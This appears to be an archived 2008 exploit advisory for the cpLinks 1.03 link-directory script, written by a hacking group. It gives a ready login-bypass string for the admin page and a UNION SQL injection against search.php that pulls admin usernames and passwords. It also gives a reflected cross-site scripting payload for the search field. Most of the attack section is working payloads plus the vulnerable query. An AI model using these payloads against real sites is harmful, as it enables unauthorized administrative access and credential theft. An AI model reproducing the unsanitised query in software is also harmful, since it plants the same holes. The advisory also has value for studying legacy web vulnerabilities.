cplinks-sqlxss.txt

cplinks-sqlxss.txt: Posted May 5, 2008; Authored by InjEctOrS; cpLinks version 1.03 suffers from login bypass, SQL injection, and cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss, sql injection; SHA-256 | 990a12e0d29c5fdede1da8ddc59d3421f0cac4612124a717f86b12c45e8c404b; Download | Favorite | View

cplinks-sqlxss.txt

|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

Title :: cpLinks v1.03 Multiple Vulnerabilities (bypass/SQL/XXS)


Author :: InjEctOr [s0f (at) w (dot) cn]

&& FishEr762  [SQ7 (at) w (dot) cn ]


Script Site :: http://www.cplinks.com/

Dork  :: ThinkinG 

Greets :: Allah ,TryaG TeaM & Muslims Hackers

Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.



--------------------------------------------[C o n t e x t]-----------------------------------------




##########################
##Expl0!T1 bypass login ##
##########################


http://[site]/[script]/admin/


in username filed insert:

' or 1=1 /*    

addition, some time must type any thing in password field



#####################################
## Explo!T 2  Reomte SQL Injection ##
#####################################

file/
search.php


@ line 57 ::


$query = "SELECT
      category,
      sub_category,
      title,
      url,
      description,
      status
      FROM mnl_links
      WHERE category='$search_category'
      AND description LIKE '%$search_text%'
      AND approved='yes'
      ORDER BY status, rec_timestamp";


search url: http://localhost/[script's_bad_day]/search.php

so just insert in search filed this query :)

' union select admin_username,admin_password,3,4,5,6 from mnl_admin/*


##################
## EXpl!T3 Xss  ##
##################


Vulnerability found in script search.php .. also !


in search field insert  >"> and then  xss c0de ::



example: >"><script>alert("!! InjEctOr TeaM Became Here !!")</script>>



############### T|-|4t'5 4ll ############### 


-------------------------------------------[End of  context]----------------------------------------

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 87 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Rodolfo Tavares 4 files
bRpsd 4 files
Google Security Research 3 files
Jann Horn 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

cplinks-sqlxss.txt

cplinks-sqlxss.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

cplinks-sqlxss.txt

Share This

cplinks-sqlxss.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems